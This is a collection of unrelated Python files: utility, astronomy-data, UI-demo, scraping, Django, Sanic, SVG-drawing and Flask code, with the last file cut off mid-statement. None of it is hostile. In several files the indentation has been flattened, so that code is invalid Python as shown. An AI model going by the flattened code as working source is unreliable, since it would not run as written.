if os.path.splitext(desDir)[-1]:
raise Exception(f'''Fail desDir: {desDir} \n\tshould be folder''')
tempDir = join(dirname(desDir), getTimeStamp())
shutil.unpack_archive(src, tempDir)
if not exists(desDir):
os.makedirs(desDir)
for mvSrc in os.listdir(tempDir):
mvSrc = join(tempDir, mvSrc)
mvDes = join(desDir, basename(mvSrc))
if remove is True and exists(mvDes):
if os.path.isfile(mvDes):
os.remove(mvDes)
else:
shutil.rmtree(mvDes, ignore_errors=True)
try:
shutil.move(mvSrc, desDir)
except Exception as exp:
shutil.rmtree(tempDir, ignore_errors=True)
raise Exception(exp)
shutil.rmtree(tempDir, ignore_errors=True)
return desDir
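# Hedged usage sketch (paths are illustrative): zipIt wraps shutil.make_archive
# and infers the archive format from the destination extension; unzipIt unpacks
# into a folder, overwriting existing entries only when remove=True.
#
#   zipIt('/tmp/exp/run1', '/tmp/run1.zip')
#   unzipIt('/tmp/run1.zip', '/tmp/restore', remove=True)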
# def float2img(img, pixmin=0, pixmax=255, dtype=0):
# '''
# convert oldFeature to (0 to 255) range
# '''
# return cv2.normalize(img, None, pixmin, pixmax, 32, dtype)
def float2img(img, min=None, max=None):
    '''
    linearly rescale an array to the 0-255 uint8 range
    '''
    min = img.min() if min is None else min
    max = img.max() if max is None else max
    img = img.astype('f4')
    img -= min
    img /= (max - min) if max != min else 1
    return (255 * img).astype('u1')
def photoframe(imgs, rcsize=None, nRow=None, resize_method=cv2.INTER_LINEAR, fit=False, asgray=False, chFirst=False):
    '''
    Pack a list of images into a single grid image for display.
    If nRow is not given, rows and columns are split as evenly as possible.
    Images of different sizes are handled automatically; the per-image size
    defaults to the shape of the first image unless rcsize is given.
    When fit is True, the final photo frame is resized to rcsize;
    when fit is False, each individual image is resized to rcsize.
    Examples (illustrative; Player, GetFeed and win are helpers from the wider project)
    --------
    video = Player(GetFeed(join(dbpath, 'videos', r'remove_rain.mp4')), custom_fn=None)
    for fnos, imgs in video.chunk(4):
        i1 = photoframe(imgs)
        i2 = photoframe(imgs, nRow=2)
        i3 = photoframe(imgs, nRow=2, rcsize=(200, 300))
        i4 = photoframe(imgs, rcsize=imgs[0].shape)
        i5 = photoframe(imgs, rcsize=imgs[0].shape, fit=True)
        i6 = photoframe(imgs, rcsize=imgs[0].shape, fit=True, asgray=True)
        for i, frame in enumerate([i1, i2, i3, i4, i5, i6], 1):
            print(i, frame.shape)
            win('i%s' % i)(frame)
        win('total')(photoframe([i1, i2, i3, i4, i5, i6]))
        if win().__wait(waittime) == 'esc':
            break
    '''
if len(imgs):
if chFirst:
imgs = np.array([np.transpose(img, [1, 2, 0]) for img in imgs])
if rcsize is None:
rcsize = imgs[0].shape
imrow, imcol = rcsize[:2] # fetch first two vals
nimgs = len(imgs)
nRow = int(np.ceil(nimgs ** .5)) if nRow is None else int(nRow)
nCol = nimgs / nRow
nCol = int(np.ceil(nCol + 1)) if (nRow * nCol) - nimgs else int(np.ceil(nCol))
if fit:
imrow /= nRow
imcol /= nCol
imrow, imcol = int(imrow), int(imcol)
resshape = (imrow, imcol) if asgray else (imrow, imcol, 3)
imgs = zip_longest(list(range(nRow * nCol)), imgs, fillvalue=np.zeros(resshape, imgs[0].dtype))
resimg = []
for i, imggroup in groupby(imgs, lambda k: k[0] // nCol):
rowimg = []
for i, img in imggroup:
if img.dtype != np.uint8:
img = float2img(img)
if asgray:
if len(img.shape) == 3:
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
elif len(img.shape) == 2:
img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
elif img.shape[-1] == 1:
img = img.reshape(*img.shape[:2])
img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
if tuple(img.shape) != resshape:
img = cv2.resize(img, (imcol, imrow), interpolation=resize_method)
rowimg.append(img)
resimg.append(cv2.hconcat(rowimg))
return cv2.vconcat(resimg)
def getTimeStamp():
return dt.now().strftime("%d%b%H%M%S_%f")
def replaces(path, *words):
path = str(path)
for word in words:
path = path.replace(*word)
return path
|
# -*- coding: utf-8 -*-
# Copyright 2017-2018 Orbital Insight Inc., all rights reserved.
# Contains confidential and trade secret information.
# Government Users: Commercial Computer Software - Use governed by
# terms of Orbital Insight commercial license agreement.
"""
Created on Fri Aug 16 19:25:37 2019
TODO
x Save metadata to output directory
x Function to read metadata
x Load straws should figure out if its searching on s3
x Straw names should include sector
x Docstrings
x Investigate async to speed writing the straws
x Add more info to metadata file
o Straw maker may not deal with edges of the ccd correctly
o Is npy the best format for writing straws?
x Do I need to save a time file?
@author: fergal
Concepts
-----------
FFI
Full Frame Image. A single image from a single camera/ccd taken by
TESS. Typically, we only want a small postage stamp from each FFI,
but we want that postage stamp for many FFIs
Datacube
A 3d numpy array, where each row is an image.
Straw
A datacube consisting of a small postage stamp image from each and every
FFI in a sector.
Camera, CCD, col, row
This 4-tuple uniquely identifies a pixel on the TESS focal plane.
This module contains a class to collect all the imagery from a set of FFIs,
and create straws that tile the entire viewing area, then another class
to construct a datacube from those tiles.
This serves the use case where you want to get all the imagery across all
FFIs for a single star. By dividing up the data this way we can minimise
the time spent on reading files, and downloading data. As such it is an
excellent approach for accessing data on single stars from s3 using an
AWS Lambda.
"""
from __future__ import print_function
from __future__ import division
from pdb import set_trace as debug
import numpy as np
import os
import astropy.io.fits as pyfits
from glob import glob
import collections
import datetime
import inspect
import json
from common import METADATA_FILE
from common import makeStrawName
class MakeTessStraw(object):
def __init__(self, ffiPath, outPath, sector, camera, ccd):
"""
Inputs
----------
ffiPath
(str) Path to FFI files on local disk. This path can contain
FFIs from mulitple ccds or cameras, but can only contain FFIs
from a single sector.
outPath
(str) Location on local disk to store straws
        sector
            (int) Sector number to process
        camera, ccd
            (int) Camera and CCD numbers to process
        """
        #The order these variables are defined in should (but is not guaranteed to)
#be reproduced in the json stored metadata. Hence a couple of
#items are defined before their values are known.
self.outPath = outPath
self.ffiPath = ffiPath
self.sector = sector
self.camera = camera
self.ccd = ccd
self.nColsRows = None #See note above
self.dataVersion = None
self.strawSize = 50
self.midtimes_tbjd = None #Will be filled in later
self.qualityFlags = None
#The sector version string is part of the FFI filename
sectorVersion= {1:120, 3:123}
        try:
            self.dataVersion = sectorVersion[sector]
        except KeyError:
            raise KeyError("sectorVersion string not hardcoded for this sector yet")
#These must be set in this order
self.datestampList = self.loadDatestamps()
self.nColsRows = self.getFfiShape()
self.do(camera, ccd)
def loadDatestamps(self):
"""Load a list of datestamps from all the FFIs in `ffiPath`
Look in the directory `self.ffiPath`, find all the FFI files,
        and extract their datestamps. It would be nice if those were also
the observation times, but this is the SPOC, so they aren't.
The datestamps are used for loading the right file from disk
"""
pattern = "tess*ffic.fits"
pattern = os.path.join(self.ffiPath, pattern)
fileList = glob(pattern)
assert len(fileList) > 0
f = lambda x: os.path.split(x)[-1].split('-')[0][4:]
datestamps = map( f, fileList)
datestamps = sorted(list(set(datestamps)))
assert len(datestamps) > 0
return datestamps
def do(self, camera, ccd):
nCols, nRows= self.nColsRows
for i in range(0, nCols, self.strawSize):
print("Processing column %i" %(i))
for j in range(0, nRows, self.strawSize):
straw, times, flags = self.makeStraw(camera, ccd, i, j)
self.writeStraw(straw, camera, ccd, i, j)
#Convert times, flags to JSON serializable lists
self.midtimes_tbjd = list(times)
self.qualityFlags = list(map(int, flags))
self.saveMetadata()
def getFfiShape(self):
"""Get the num cols and rows from the FFI header"""
ffiName = self.getFfiName(0, self.camera, self.ccd)
hdr = pyfits.getheader(ffiName, 1)
nCols = hdr['NAXIS1']
nRows = hdr['NAXIS2']
return nCols, nRows
def makeStraw(self, camera, ccd, col, row):
"""Make a straw at the requested location
Inputs
-------------
camera, ccd, col, row
(int) Properties of the straw. col and row refer to coordinates of
the bottom-left corner of the straw.
Returns
---------
np 3d array
"""
nCol, nRow = self.strawSize, self.strawSize
nCadence = len(self.datestampList)
straw = np.empty( (nCadence, nRow, nCol) )
midtimes_tbjd = np.empty(nCadence)
flags = np.empty(nCadence, dtype=int)
for i in range(nCadence):
ffiName = self.getFfiName(i, camera, ccd)
frame, time, flagValue = self.readFfiSection(ffiName, col, row)
nr, nc = frame.shape
straw[i,:nr,:nc] = frame
midtimes_tbjd[i] = time
flags[i] = flagValue
return straw, midtimes_tbjd, flags
def writeStraw(self, straw, camera, ccd, col, row):
"""
Write a straw to disk
Inputs
-----------
straw
(3d npy array) The data to save
camera, ccd, col, row
(int) Properties of the straw. col and row refer to coordinates of
the bottom-left corner of the straw.
"""
path, fn = makeStrawName(self.outPath,
self.sector,
camera,
ccd,
col,
row)
if not os.path.exists(path):
os.makedirs(path)
fn = os.path.join(path, fn)
np.save(fn, straw)
def readFfiSection(self, ffiName, col, row):
"""Read a postage stamp from an FFI file
This is by far the most expensive function in the class
and optimisation efforts should focus here
"""
hdulist = pyfits.open(ffiName, memmap=True)
img = hdulist[1]
slCol = slice(col, col + self.strawSize)
slRow = slice(row, row + self.strawSize)
data = img.section[slRow, slCol]
tstart = img.header['TSTART']
tend = img.header['TSTOP']
midtime_tbjd = .5 * (tstart + tend)
flag = img.header['DQUALITY']
hdulist.close()
return data, midtime_tbjd, flag
def getFfiName(self, cadenceNum, camera, ccd):
"""Construct the path to an FFI on local disk
Raises an index error if `cadenceNum` is out of bounds on the
list of FFIs available
"""
datestamp = self.datestampList[cadenceNum]
fn = "tess%s-s%04i-%i-%i-%04i-s_ffic.fits" \
%(datestamp, self.sector, camera, ccd, self.dataVersion)
return os.path.join(self.ffiPath, fn)
def saveMetadata(self):
"""Save a metadata file to a local filestore
"""
fn = os.path.join(self.outPath, "sector%02i" %(self.sector), METADATA_FILE)
frame = inspect.currentframe().f_back
(filename, lineno, funcname, _, _) = inspect.getframeinfo(frame)
params = collections.OrderedDict()
params['__file__'] = filename
params['__lineno__'] = lineno
params['__date__'] = str(datetime.datetime.now())
params['__user__'] = os.environ['USER']
params.update(self.__dict__)
text = json.dumps(params, indent=2)
with open(fn, 'w') as fp:
fp.write(text)
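# Hedged usage sketch (paths, sector, camera and ccd values are illustrative):
# constructing the class runs the whole pipeline, tiling the FFIs for one
# camera/ccd into 50x50-pixel straws and writing a metadata JSON alongside them.
#
#   MakeTessStraw(ffiPath="/data/tess/sector01/ffi",
#                 outPath="/data/tess/straws",
#                 sector=1, camera=1, ccd=1)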
|
import pglet
from pglet import Button, Message, MessageButton, Stack, Text
def messages():
return Stack(
width="70%",
gap=20,
controls=[
Text("Messages", size="xLarge"),
Message(value="This is just a message."),
Message(
value="Success message with dismiss button",
dismiss=True,
type="success",
),
Message(
value="Error message with dismiss button", dismiss=True, type="error"
),
Message(
type="blocked",
truncated=True,
dismiss=True,
value="Blocked Message - single line, with dismiss button and truncated text. Truncation is not available if you use action buttons or multiline and should be used sparingly. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Morbi luctus, purus a lobortis tristique, odio augue pharetra metus, ac placerat nunc mi nec dui. Vestibulum aliquam et nunc semper scelerisque. Curabitur vitae orci nec quam condimentum porttitor et sed lacus. Vivamus ac efficitur leo. Cras faucibus mauris libero, ac placerat erat euismod et. Donec pulvinar commodo odio sit amet faucibus. In hac habitasse platea dictumst. Duis eu ante commodo, condimentum nibh pellentesque, laoreet enim. Fusce massa lorem, ultrices eu mi a, fermentum suscipit magna. Integer porta purus pulvinar, hendrerit felis eget, condimentum mauris. You've been warned!",
),
Message(
type="warning",
dismiss=True,
value="Warning message with buttons",
buttons=[
MessageButton(text="Yes", action="yes"),
MessageButton(text="No", action="no"),
],
),
Message(
type="severeWarning",
multiline=True,
value="SevereWarning defaults to multiline. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Morbi luctus, purus a lobortis tristique, odio augue pharetra metus, ac placerat nunc mi nec dui. Vestibulum aliquam et nunc semper scelerisque. Curabitur vitae orci nec quam condimentum porttitor et sed lacus. Vivamus ac efficitur leo. Cras faucibus mauris libero, ac placerat erat euismod et. Donec pulvinar commodo odio sit amet faucibus. In hac habitasse platea dictumst. Duis eu ante commodo, condimentum nibh pellentesque, laoreet enim. Fusce massa lorem, ultrices eu mi a, fermentum suscipit magna. Integer porta purus pulvinar, hendrerit felis eget, condimentum mauris.",
buttons=[MessageButton("OK"), MessageButton("Cancel")],
),
message_with_on_dismiss(),
message_with_on_dismiss_and_buttons(),
],
)
def message_with_on_dismiss():
def message_dismissed(e):
t.value = "Message dismissed!"
stack.update()
m = Message(
value="Message with on_dismiss event",
dismiss=True,
on_dismiss=message_dismissed,
)
t = Text()
stack = Stack(controls=[m, t])
return stack
def message_with_on_dismiss_and_buttons():
def message_dismissed(e):
t.value = f"Message dismissed with {e.data} action"
stack.update()
m = Message(
value="Message with dismiss event and buttons",
dismiss=True,
on_dismiss=message_dismissed,
buttons=[MessageButton("OK"), MessageButton("Cancel")],
)
t = Text()
stack = Stack(controls=[m, t])
return stack
def main(page):
page.title = "Message control samples"
page.horizontal_align = "stretch"
page.update()
page.add(messages())
pglet.app("python-message", target=main)
|
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from time import sleep
options = Options()
options.headless = True
url = 'http://www.duksung.ac.kr/diet/schedule.do?menuId=1151'
driver = webdriver.Firefox(options=options)
driver.get(url)
driver.implicitly_wait(5)
sleep(3)
html = driver.page_source
with open('page.html', 'w', encoding='utf-8') as out_fp:
    out_fp.write(html)
driver.close()
|
# Generated by Django 2.1.2 on 2018-10-20 11:16
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('twitmining', '0020_auto_20181020_0936'),
]
operations = [
migrations.AddField(
model_name='query',
name='language',
field=models.CharField(default='DEFAULT VALUE', max_length=100),
),
]
|
import re
from django.conf import settings
from django.contrib.auth.decorators import login_required
from .backends import AzureADBackend
import logging
logger = logging.getLogger(__name__)
# TODO manage for rest_framework, daphne
class SSORequireLoginMiddleware(object):
"""
Add login_required decorator to all views except 3 urls - Login/ Callback and Logout Redirect Url
"""
def __init__(self, get_response):
self.get_response = get_response
self.required = tuple(re.compile(url) for url in (r"/(.*)$",))
self.exceptions = tuple(re.compile( r"^/" + url.strip("/") + "[/]?$") for url in (
AzureADBackend.LOGIN_URL,
AzureADBackend.REDIRECT_URI,
AzureADBackend.POST_LOGOUT_REDIRECT_URI,
) if url)
def __call__(self, request):
# Code to be executed for each request before
# the view (and later middleware) are called.
response = self.get_response(request)
# Code to be executed for each request/response after
# the view is called.
return response
def process_view(self, request, view_func, view_args, view_kwargs):
# No need to process URLs if user already logged in
if request.user.is_authenticated:
return None
# An exception match should immediately return None
for url in self.exceptions:
if url.match(request.path):
return None
# Requests matching a restricted URL pattern are returned
# wrapped with the login_required decorator
for url in self.required:
if url.match(request.path):
return login_required(view_func)(request, *view_args, **view_kwargs)
# Explicitly return None for all non-matching requests
return None
# def process_exception(self, request, exception):
# None or HttpResponse()
# def process_template_response(self, request, response):
# response.context_data['key'] = 'value'
# return response
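# Hedged configuration sketch (the dotted path is hypothetical): the middleware
# is enabled by appending it to Django's MIDDLEWARE list after the authentication
# middleware, so request.user is populated before process_view runs.
#
#   MIDDLEWARE = [
#       ...,
#       'django.contrib.auth.middleware.AuthenticationMiddleware',
#       'myproject.middleware.SSORequireLoginMiddleware',
#   ]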
|
#!/usr/bin/env python
"""
Module containing Svg class and helper functions
"""
import math
from lxml import etree
def json_to_style(json):
"""
convert a json to a string formated as style argument
{ a : "b", c : "d" } -> "a:b;c:d;"
"""
style_argument = ""
for attribute, value in json.items():
style_argument = style_argument + attribute + ":" + value + ";"
return style_argument
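# Hedged example: json_to_style({'fill': '#ffffff', 'stroke': '#000000'})
# returns "fill:#ffffff;stroke:#000000;" (dict insertion order is preserved
# on Python 3.7+).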
class Svg(object):
"""
Class managing SVG elements via lxml.etree
"""
def __init__(self, root=None, width=0, height=0, id_name="svg_element"):
if root is None:
self.root = etree.Element("svg",
{"width": str(width),
"height": str(height),
"id": id_name
})
else:
self.root = root
def create_subgroup(
self,
group_id,
class_name=None,
additional_arguments=None):
"""
create a subgroup in root and return it
"""
arguments = {'id': str(group_id)}
if class_name is not None:
arguments['class'] = str(class_name)
if additional_arguments is not None:
arguments.update(additional_arguments)
group = etree.SubElement(self.root, 'g', arguments)
return Svg(group)
def create_ellipse(
self,
radius,
center,
stroke_colour,
id_name,
fill=None,
stroke_width="1",
stroke_opacity="0.5",
opacity="1"):
"""
Create an ellipse in root and return it
"""
(radius_x, radius_y) = radius
(center_x, center_y) = center
style = {
'stroke': stroke_colour,
'stroke-width': str(stroke_width),
'stroke-opacity': str(stroke_opacity),
}
if fill is not None:
style['fill'] = fill
style['opacity'] = str(opacity)
ell_attribs = {
'style': json_to_style(style),
'cx': str(center_x),
'cy': str(center_y),
'rx': str(radius_x),
'ry': str(radius_y),
'id': str(id_name)
}
ellipse = etree.SubElement(self.root, 'ellipse', ell_attribs)
return Svg(ellipse)
def create_hex(
self,
id_name,
center,
coordinates,
hex_size,
fill_colour,
class_name,
fill_opacity="0.5",
stroke_colour='#FFFFFF',
stroke_width="1",
enableOnClick=False,
onclick="clickHex(this)",
stroke_opacity="1"):
"""
Create a hex in root and return it
"""
(center_x, center_y) = center
(coord_q, coord_r) = coordinates
hex_width = float(2 * hex_size)
hex_height = math.sqrt(3) * hex_size
points = [
[center_x - hex_width / 4, center_y - hex_height / 2],
[center_x + hex_width / 4, center_y - hex_height / 2],
[center_x + hex_width / 2, center_y],
[center_x + hex_width / 4, center_y + hex_height / 2],
[center_x - hex_width / 4, center_y + hex_height / 2],
[center_x - hex_width / 2, center_y]
]
str_points = ""
for point in points:
str_points = str_points + str(point[0]) + "," + str(point[1]) + " "
style = {
'stroke': stroke_colour,
'stroke-width': str(stroke_width),
'stroke-opacity': str(stroke_opacity),
'fill': fill_colour,
'fill-opacity': str(fill_opacity)
}
ell_attribs = {
'style': json_to_style(style),
'points': str_points,
'id': str(id_name),
'coord_q': str(coord_q),
'coord_r': str(coord_r),
'class': class_name
}
if enableOnClick:
ell_attribs['onclick'] = onclick
hex_element = etree.SubElement(self.root, 'polygon', ell_attribs)
return Svg(hex_element)
def create_text(
self,
id_name,
position,
content,
font_size=8,
font_colour="#000000",
text_align="center",
text_anchor="middle",
font_weight="normal"):
"""
Create a text in root and return it
"""
(position_x, position_y) = position
style = {
'text-align': text_align,
'text-anchor': text_anchor,
'font-size': str(font_size) + "pt"
}
attributes = {
'style': json_to_style(style),
'x': str(position_x),
'y': str(position_y),
'fill': font_colour,
'font-weight': font_weight,
'id': id_name
}
text = etree.SubElement(self.root, 'text', attributes)
text.text = content
return Svg(text)
def create_rectangle(
self,
position,
size,
id_name,
fill_colour=None,
stroke_colour=None,
stroke_width=None,
fill_opacity=None,
additional_arguments=None):
"""
Create a rectangle in root and return it
"""
(position_x, position_y) = position
(size_width, size_height) = size
if additional_arguments is None:
additional_arguments = {}
style = {}
if fill_colour:
style['fill'] = fill_colour
if stroke_colour:
style['stroke'] = stroke_colour
if stroke_width:
style['stroke-width'] = str(stroke_width)
if fill_opacity:
style['fill-opacity'] = str(fill_opacity)
arguments = {
'style': json_to_style(style),
'id': id_name,
'width': str(size_width),
'height': str(size_height),
'x': str(position_x),
'y': str(position_y),
}
for attribute, value in additional_arguments.items():
arguments[attribute] = value
rect = etree.SubElement(self.root, 'rect', arguments)
return Svg(rect)
def create_circle(self, center, radius, id_name,
fill_colour=None, additional_arguments=None):
"""
Create a circle in root and return it
"""
(center_x, center_y) = center
if additional_arguments is None:
additional_arguments = {}
arguments = {
'id': id_name,
'cx': str(center_x),
'cy': str(center_y),
'r': str(radius)
}
if fill_colour is not None:
arguments["style"] = "fill:" + fill_colour
for attribute, value in additional_arguments.items():
arguments[attribute] = value
circle = etree.SubElement(self.root, 'circle', arguments)
return Svg(circle)
def create_line(self, position_start, position_end,
stroke_colour="#000000",
stroke_width="1"):
"""
create a line in root and return it
"""
(start_x, start_y) = position_start
(end_x, end_y) = position_end
style = {
'stroke': stroke_colour,
'stroke-width': str(stroke_width)
}
arguments = {
'x1': str(start_x),
'x2': str(end_x),
'y1': str(start_y),
'y2': str(end_y),
'style': json_to_style(style)
}
line = etree.SubElement(self.root, 'line', arguments)
return Svg(line)
def create_path(self, commands, stroke_colour=None, fill_colour=None,
id_name=None, additional_arguments=None):
"""
create a path in root and return it
"""
arguments = {
'd': commands
}
if stroke_colour is not None:
arguments["stroke"] = stroke_colour
if fill_colour is not None:
arguments["fill"] = fill_colour
if id_name is not None:
arguments['id'] = id_name
if additional_arguments is not None:
arguments.update(additional_arguments)
path = etree.SubElement(self.root, 'path', arguments)
return Svg(path)
def create_polygon(self, points, fill_colour=None, stroke_colour=None):
"""
create a polygon in root and return it
"""
arguments = {
'points': points
}
style = {}
if fill_colour is not None:
style['fill'] = fill_colour
if stroke_colour is not None:
style['stroke'] = stroke_colour
arguments['style'] = json_to_style(style)
polygon = etree.SubElement(self.root, 'polygon', arguments)
return Svg(polygon)
def use_symbol(self, symbol_name, id_name, position=None,
fill_colour=None, additional_arguments=None):
"""use a symbol which had to be defined earlier
Arguments:
symbol_name {string} -- name of the symbol
id_name {string} -- id
position {(int, int)} -- (x, y) (default: {None})
Keyword Arguments:
fill_colour {string} -- colour (default: {None})
additional_arguments {json} -- any additional arguments (default: {None})
"""
if additional_arguments is None:
additional_arguments = {}
arguments = {
'href': '#' + symbol_name,
'id': id_name
}
if position is not None:
(position_x, position_y) = position
arguments['x'] = str(position_x)
arguments['y'] = str(position_y)
if fill_colour is not None:
arguments["style"] = json_to_style({'fill': fill_colour})
for attribute, value in additional_arguments.items():
arguments[attribute] = value
symbol = etree.SubElement(self.root, 'use', arguments)
return Svg(symbol)
def create_image(self, image_name, width, height, x_pos, y_pos):
"""
Create an image in root and return it.
"""
image = etree.SubElement(self.root, 'image', {
'href': image_name, 'width': width, 'height': height, 'x': x_pos, 'y': y_pos})
image.text = " "
return Svg(image)
def create_scoring_track(self, size_box, subgroup_name, x_elements, y_elements,
grey_element, fill_colour="#FFFFFF", font_size=8, additional_arguments=None):
"""
create the whole scoring track
"""
if additional_arguments is None:
additional_arguments = {}
layer = self.create_subgroup(subgroup_name)
for i in range(0, x_elements + 1):
layer.draw_scoring_box(
(i*size_box, 0),
(size_box, size_box),
"{}_{}".format(subgroup_name, i),
i,
grey_element,
fill_colour,
font_size,
additional_arguments
)
for i in range(x_elements, x_elements + y_elements + 1):
layer.draw_scoring_box(
(x_elements*size_box, (i - x_elements)*size_box),
(size_box, size_box),
"{}_{}".format(subgroup_name, i),
i,
grey_element,
fill_colour,
font_size,
additional_arguments
)
for i in range(x_elements + y_elements, 2*x_elements + y_elements + 1):
layer.draw_scoring_box(
((2*x_elements + y_elements - i)*size_box, y_elements*size_box),
(size_box, size_box),
"{}_{}".format(subgroup_name, i),
i,
grey_element,
fill_colour,
font_size,
additional_arguments
)
for i in range(2*x_elements + y_elements, 2*x_elements + 2*y_elements):
layer.draw_scoring_box(
(0, (2*x_elements + 2*y_elements - i)*size_box),
(size_box, size_box),
"{}_{}".format(subgroup_name, i),
i,
grey_element,
fill_colour,
font_size,
additional_arguments
)
def draw_scoring_box(self, position, size, id_name, number, grey_element,
fill_colour="#FFFFFF", font_size=8, additional_arguments=None):
"""
draw one box of the scoring track
"""
if additional_arguments is None:
additional_arguments = {}
additional_arguments["value"] = str(number)
(position_x, position_y) = position
(width, height) = size
self.create_rectangle((position_x, position_y), (width, height),
id_name, fill_colour=fill_colour,
stroke_colour="#000000",
stroke_width=1,
fill_opacity=1,
additional_arguments=additional_arguments)
if number % grey_element == 0:
self.create_rectangle(
[position_x, position_y],
size,
"{}_transperent".format(id_name),
fill_colour="black",
fill_opacity="0.4"
)
self.create_text(
id_name,
(position_x + width / 2, position_y + height / 2 + font_size / 2),
str(number),
font_size=font_size
)
def get_string(self):
"""
return root element converted to string
"""
return etree.tostring(self.root, pretty_print=True).decode('utf-8')
def __str__(self):
return self.get_string()
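# Hedged usage sketch (ids and sizes are illustrative): an Svg object wraps an
# lxml element; the helper methods append child elements and return them wrapped
# in new Svg instances, so a drawing can be built up incrementally.
#
#   svg = Svg(width=100, height=100, id_name="board")
#   layer = svg.create_subgroup("layer_1")
#   layer.create_circle((50, 50), 20, "marker", fill_colour="#ff0000")
#   print(svg.get_string())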
def get_position(size, x_elements, y_elements, points, stack_position):
"""
given the points and the number of markers below in the stack
return the position where to print the marker
"""
POSITION_LOWEST_DISC = 15
space = points % (2*(x_elements+y_elements))
if 0 <= space <= x_elements:
x_pos = space * size
y_pos = POSITION_LOWEST_DISC
elif x_elements < space <= x_elements + y_elements:
x_pos = x_elements * size
y_pos = POSITION_LOWEST_DISC + (space - x_elements) * size
elif x_elements + y_elements < space <= 2*x_elements + y_elements:
x_pos = (2*x_elements + y_elements - space) * size
y_pos = POSITION_LOWEST_DISC + y_elements*size
elif 2*x_elements + y_elements < space < 2*x_elements + 2*y_elements:
x_pos = 0
y_pos = POSITION_LOWEST_DISC + \
(2*x_elements + 2*y_elements - space) * size
return [x_pos, y_pos - 4*stack_position]
def main():
"""
no main implemented
"""
print("no main implemented")
if __name__ == '__main__':
main()
|
def compute(a, b, c, d, e):
print(e)
tmp = a + b
if 1 and 2:
tmp *= 2
return tmp
__transonic__ = ("0.3.0.post0",)
|
#!/usr/bin/env python
#import moveit_commander
#from geometry_msgs.msg import Pose, Quaternion
#from tf.transformations import quaternion_from_euler
import time
import cv2
import numpy as np
#group= moveit_commander.MoveGroupCommander("arm")
#ps = Pose()
#img = cv2.imread("./test.png")
#print ("img shape: ", img.shape) # 217, 403
def img_2_csv():
img = cv2.imread("./test.png")
# shape = (217, 403, 3) -> 21.7 cm, 40.3 cm, rgb 3 colors
shape = img.shape
new_shape = (int(shape[0]/10), int(shape[1]/10), 3)
print (new_shape)
new_img = np.zeros(new_shape)
    for i in range(0, new_shape[0]):
        for j in range(0, new_shape[1]):
            # average each 10x10 block of pixels, one running total per colour channel
            tmp_total_r = 0
            tmp_total_g = 0
            tmp_total_b = 0
            for w in range(0, 10):
                for h in range(0, 10):
                    tmp_total_r += int(img[i*10+w, j*10+h, 0])
                    tmp_total_g += int(img[i*10+w, j*10+h, 1])
                    tmp_total_b += int(img[i*10+w, j*10+h, 2])
            new_img[i, j, 0] = int(tmp_total_r / 100)
            new_img[i, j, 1] = int(tmp_total_g / 100)
            new_img[i, j, 2] = int(tmp_total_b / 100)
if __name__ == "__main__":
img_2_csv()
|
# Copyright 2018 BLEMUNDSBURY AI LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Union
from sanic import Sanic
from logging import info
from cape_webservices.configuration.configuration_core import configuration_endpoints
from cape_webservices.errors.errors_core import errors_endpoints
from cape_webservices.app.app_core import app_endpoints
from cape_webservices.app.app_annotation_endpoints import app_annotation_endpoints
from cape_webservices.app.app_document_endpoints import app_document_endpoints
from cape_webservices.app.app_saved_reply_endpoints import app_saved_reply_endpoints
from cape_webservices.app.app_inbox_endpoints import app_inbox_endpoints
from cape_webservices.app.app_user_endpoints import app_user_endpoints
from cape_webservices import webservices_settings
app = Sanic(__name__)
app.blueprint(app_endpoints)
app.blueprint(app_annotation_endpoints)
app.blueprint(app_document_endpoints)
app.blueprint(app_saved_reply_endpoints)
app.blueprint(app_inbox_endpoints)
app.blueprint(app_user_endpoints)
app.blueprint(errors_endpoints)
app.blueprint(configuration_endpoints)
app.static('/', file_or_directory=webservices_settings.STATIC_FOLDER)
app.static('/', file_or_directory=webservices_settings.HTML_INDEX_STATIC_FILE)
# Import plugins if they're installed
enabled_plugins = []
try:
from cape_facebook_plugin.facebook_auth import facebook_auth_endpoints
from cape_facebook_plugin.facebook_events import facebook_event_endpoints
app.blueprint(facebook_auth_endpoints)
app.blueprint(facebook_event_endpoints)
enabled_plugins.append('facebook')
info('Facebook plugin enabled')
except ImportError:
info('Facebook plugin disabled')
try:
from cape_hangouts_plugin.hangouts_events import hangouts_event_endpoints
app.blueprint(hangouts_event_endpoints)
enabled_plugins.append('hangouts')
info('Hangouts plugin enabled')
except ImportError:
info('Hangouts plugin disabled')
try:
from cape_slack_plugin.slack_auth import slack_auth_endpoints
from cape_slack_plugin.slack_events import slack_event_endpoints
app.blueprint(slack_auth_endpoints)
app.blueprint(slack_event_endpoints)
enabled_plugins.append('slack')
info('Slack plugin enabled')
except ImportError:
info('Slack plugin disabled')
try:
from cape_email_plugin.email_events import email_event_endpoints
app.blueprint(email_event_endpoints)
enabled_plugins.append('email')
info('Email plugin enabled')
except ImportError as e:
print(e)
info('Email plugin disabled')
app.config.update(webservices_settings.WEBAPP_CONFIG)
info(f"List of active endpoints { app.router.routes_all.keys() }")
def run(port: Union[None, int] = None):
if port is not None:
webservices_settings.CONFIG_SERVER['port'] = int(port)
info("Using port: %d", webservices_settings.CONFIG_SERVER['port'])
app.config.LOGO = None
app.run(**webservices_settings.CONFIG_SERVER)
|
from django.contrib import admin
# Register your models here.
from .models import UserProfile
@admin.register(UserProfile)
class UserProfileAdmin(admin.ModelAdmin):
list_display = ('user', 'display_location', 'date_joined', 'updated_on')
|
from flask import request
from flask_restful import Resource
from apps.models.user_package.schema.user_schema import UserSchema
from apps.models.user_package.user.user_model import User
from mongoengine.errors import FieldDoesNotExist
from apps.responses.responses import resp_exception, resp_ok
from ..utils.user_utils import get_user_by_id
class AdminSearchUser(Resource):
def get(self, user_id):
result = None
user = None
schema = UserSchema(many=False)
user = get_user_by_id(user_id)
result = schema.dump(user)
return resp_ok(
'Users',
'Usuário encontrado',
